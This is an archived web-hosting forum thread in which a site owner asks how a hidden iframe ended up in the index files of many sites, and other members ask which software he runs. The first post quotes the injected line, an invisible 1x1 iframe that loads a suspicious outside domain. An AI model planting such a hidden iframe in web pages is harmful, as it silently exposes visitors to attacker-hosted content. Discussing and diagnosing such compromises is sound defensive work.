Help - Search - Members - Calendar
Full Version: bigstoreus iframe
The Planet Forums > Security > General Security
salinger
Feb 9 2008, 02:56 PM
Somebody inserted the following iframe on many websites (index files only) hosted on different servers
CODE
<iframe src=http://www.bigstoreus .info width=1 height=1 style="display:none"></iframe>


and i'm wondering how they did it? All index files are CHMODed 644, only the owner has the permission to modify them...

They used a security hole? Any ideas greatly appreciated!
markcausa
Feb 9 2008, 03:19 PM
Well, for one thing, the hacker doesn't know how to type valid HTML...

Honestly, I have no idea. Are you running any popular PHP software like PHPBB, IPB, etc?
salinger
Feb 10 2008, 05:13 PM
I run IPB, only on one server...
markcausa
Feb 10 2008, 11:24 PM
Ok, I'm trying to find out if you have any scripts that allow input from visitors. Do you?
salinger
Feb 12 2008, 11:19 AM
Not on all servers.

I think the problem is more complex... they use something more complicated, they don't exploit the scripts. At least not the CMS 'cause i have different CMSes on servers - from the latest version of Wordpress to custom made CMSes.



Later edit. For those who have the same problem, read here:
http://news.netcraft.com/archives/2006/09/..._mass_hack.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2009 Invision Power Services, Inc.